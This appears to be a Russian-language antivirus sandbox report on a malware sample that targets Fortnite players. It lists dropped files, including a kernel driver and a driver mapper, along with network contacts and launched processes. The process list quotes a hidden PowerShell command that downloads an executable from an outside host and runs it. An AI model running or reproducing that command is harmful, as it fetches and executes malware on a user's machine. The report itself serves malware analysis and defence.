Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\shitty_driver.sys
- <SYSTEM32>\tasks\shitty_mapper.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\bk981089.exe
Сетевая активность
Подключается к
- 'vc###ibrary.uk':443
- 'mo#####.map.fastly.net':443
TCP
Другие
- 'vc###ibrary.uk':443
UDP
- DNS ASK vc###ibrary.uk
- DNS ASK mo#####.map.fastly.net
- DNS ASK co##############e-chains.prod.autograph.services.mozaws.net
Другое
Ищет следующие окна
- ClassName: '' WindowName: 'Fortnite '
Создает и запускает на исполнение
- '<SYSTEM32>\tasks\shitty_mapper.exe' <SYSTEM32>\Tasks\shitty_driver.sys
- '%TEMP%\bk981089.exe'
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c start /min cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=QTuVl0PCseGLafunsZPRE008.txt' -OutFile $env:TEMP\BK981089.exe; Start-Proc...
- '<SYSTEM32>\cmd.exe' /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=QTuVl0PCseGLafunsZPRE008.txt' -OutFile $env:TEMP\BK981089.exe; Start-Process -FilePath $env:TEM...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=QTuVl0PCseGLafunsZPRE008.txt' -OutFile $env:TEMP\BK981089.exe; Start-Process -FilePath $env:TEMP\BK981089.exe...
- '<SYSTEM32>\cmd.exe' /c <SYSTEM32>\Tasks\shitty_mapper.exe <SYSTEM32>\Tasks\shitty_driver.sys
- '%TEMP%\bk981089.exe' (со скрытым окном)
